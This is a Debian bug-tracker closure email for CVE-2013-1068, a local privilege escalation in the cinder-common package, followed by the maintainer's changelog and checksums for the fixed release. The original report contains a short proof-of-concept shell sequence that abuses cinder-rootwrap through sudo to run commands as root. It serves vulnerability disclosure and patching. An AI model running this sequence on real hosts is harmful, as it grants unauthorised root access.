Your message dated Thu, 03 Jul 2014 13:33:49 +0000
with message-id <e1x2h93-00010x...@franck.debian.org>
and subject line Bug#753585: fixed in cinder 2014.1.1-3
has caused the Debian Bug report #753585,
regarding cinder: CVE-2013-1068: local privilege escalation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
753585: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=753585
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: cinder-common
Version: 2014.1.1-2
Severity: grave
Tags: security, confirmed
After installing cinder-common file /etc/sudoers.d/cinder-common is created. If
/etc/sudoers contains "#includedir /etc/sudoers.d" cinder is vulnerable to
CVE-2013-1068 local privilege escalation. Vulnerability does not need working
OpenStack installation. If I am correct OpenStack does not work without
includedir configuration so it might be usually enabled in OpenStack instances.
PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019
"""
echo [DEFAULT] >/tmp/my-rootwrap.conf
echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf
mkdir /tmp/my-filters.d
echo [Filters] >/tmp/my-filters.d/my.filters
echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters
sudo -n cinder-rootwrap /tmp/my-rootwrap.conf sh -c id
"""
---
Henri Salo
signature.asc
Description: Digital signature
--- End Message ---
--- Begin Message ---
Source: cinder
Source-Version: 2014.1.1-3
We believe that the bug you reported is fixed in the latest version of
cinder, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 753...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Thomas Goirand <z...@debian.org> (supplier of updated cinder package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Thu, 03 Jul 2014 21:14:40 +0800
Source: cinder
Binary: python-cinder cinder-common cinder-api cinder-volume cinder-scheduler
cinder-backup
Architecture: source all
Version: 2014.1.1-3
Distribution: unstable
Urgency: high
Maintainer: PKG OpenStack <openstack-de...@lists.alioth.debian.org>
Changed-By: Thomas Goirand <z...@debian.org>
Description:
cinder-api - OpenStack block storage system - API server
cinder-backup - OpenStack block storage system - Backup server
cinder-common - OpenStack block storage system - common files
cinder-scheduler - OpenStack block storage system - Scheduler server
cinder-volume - OpenStack block storage system - Volume server
python-cinder - OpenStack block storage system - Python libraries
Closes: 753585
Changes:
cinder (2014.1.1-3) unstable; urgency=high
.
* CVE-2013-1068: fixed debian/cinder-common.sudoers (Closes: #753585).
Checksums-Sha1:
6c9186681a2d65b08b99c3d7a30d453a7046c67e 3469 cinder_2014.1.1-3.dsc
10b87c3922d64acf5d4b277dfc0005c9b477d787 26752 cinder_2014.1.1-3.debian.tar.xz
5142c3af586bc7de1f61ff34c1d82e6cb604481a 806762
python-cinder_2014.1.1-3_all.deb
d488cf7a344332c58a4db91ac6c03bd14ddc2d0b 48218 cinder-common_2014.1.1-3_all.deb
bd8c740306f67338a18fcf82ce53f3f51227ce71 24360 cinder-api_2014.1.1-3_all.deb
b3feb54c9030a09fb7a5cf81e12e5916126d905b 19910 cinder-volume_2014.1.1-3_all.deb
805f9f0763d2d931b8b001884871681e74f6f2df 8394
cinder-scheduler_2014.1.1-3_all.deb
754b640fbd9b9b4586844f0df303c3aff4e5386a 8054 cinder-backup_2014.1.1-3_all.deb
Checksums-Sha256:
ce8df5798595b74fd92926021153caf2bdf29d08796785df25f84c6ba60a9a89 3469
cinder_2014.1.1-3.dsc
44f54a428801ff3142c6e872f4bd9052969c7d26f288631c3b12f2991559fd07 26752
cinder_2014.1.1-3.debian.tar.xz
3a830199d57181a336736342c0185bdb253131462f14160661d7017b610b6d6e 806762
python-cinder_2014.1.1-3_all.deb
c742f5cc005c0ddaef6f7b36f8e2f59f5f994fae6e956dcae44e0d1cdb181e60 48218
cinder-common_2014.1.1-3_all.deb
23751bdd2af92649661fd5db00381014fe93332a9cdc2ea878e8779b7b288c90 24360
cinder-api_2014.1.1-3_all.deb
73135d3517be3adf7134dcf75df394ba651b9ee6c0cf496fc1b4454fb8ad37e0 19910
cinder-volume_2014.1.1-3_all.deb
97df928458696cb58c36656eec833975ba202643aec9a0217e3976ec41010fba 8394
cinder-scheduler_2014.1.1-3_all.deb
cf90ce2e1887cc66103f2695ada4d7859d95db505f81f2f8342094ebbccc48a6 8054
cinder-backup_2014.1.1-3_all.deb
Files:
11fa3cf234ee5457919c18963c80f9a4 806762 python extra
python-cinder_2014.1.1-3_all.deb
90dcdc9bd79833760bc848b4012d35c1 48218 net extra
cinder-common_2014.1.1-3_all.deb
d3428c04f7d857770c40059621f5c25d 24360 net extra cinder-api_2014.1.1-3_all.deb
dc0b79e7ee9845102cc30f1f654562d3 19910 net extra
cinder-volume_2014.1.1-3_all.deb
f9610420ff4ad7b941b60eed99f11edf 8394 net extra
cinder-scheduler_2014.1.1-3_all.deb
005dfd47d1e0d786d0745020e6b8485d 8054 net extra
cinder-backup_2014.1.1-3_all.deb
2bcc724e1ef6282aa584cfd7f047eb95 3469 net extra cinder_2014.1.1-3.dsc
63fd9934a10b8398978ee449f429716f 26752 net extra
cinder_2014.1.1-3.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCAAGBQJTtVg2AAoJENQWrRWsa0P+iHIP/2n9IBrXOC5xeGpM/Acg+3it
QHjqwMlGVLew0BzJOStWEj+WzngGfqRp2LOzEL7aXBP5UDgX4/POuKvY0+XBOoLf
xS0bn1SEKly9qUFFxevgYR47UqGqA657SjuC5Uqn1fdx9nV3cTYwb8W+Mr6RjEuo
BTgrIn8jGFq4bb+AextH0Go/0jq77ZUElib86i0a73wXKuLD3kgnA9w1jE0Pvru2
BjGV7eCR4h/sq4/UH2UePiigEm66QJnEL6vkdT/NuJZVsxbl17IzaPTvAAHknyzY
YYK5GPW4unoHtdVJpMyHQX3jZkYXpJLt06kv5DkfNFLZwK+iKqM0h5ydwNHf2EEm
MsdRXNV8yynQ6isefhje0yNl4htN2IBYavGvxpEZd7sjxocfvpCfd5DNHpfYN81p
zZACdqDBEAtcrDdaNhw2+/CNcT2vBzIP9/bql/aF3x0UG8vyPHALrTHt+SjLhQTJ
YJ4aOi5myvgjolVH4/Vsb/zyDAW98/zXHjz8ns/SK2jyI6NSw+mxOf6R6/Kn96fs
lFcNueAldbclzkR19xneBxrB0bZJJj/LW5e9Ny5khfOaSZ89C8FDsRkwG0s3JmEK
xSPvCtDw75E2tD2TkvT7u4dRAXNc/eyTxipr6j4Eb43awYvhOpaJfljB0U7SJlxm
ciXYwsWnDI91QVSsZ7Ro
=t47S
-----END PGP SIGNATURE-----
--- End Message ---
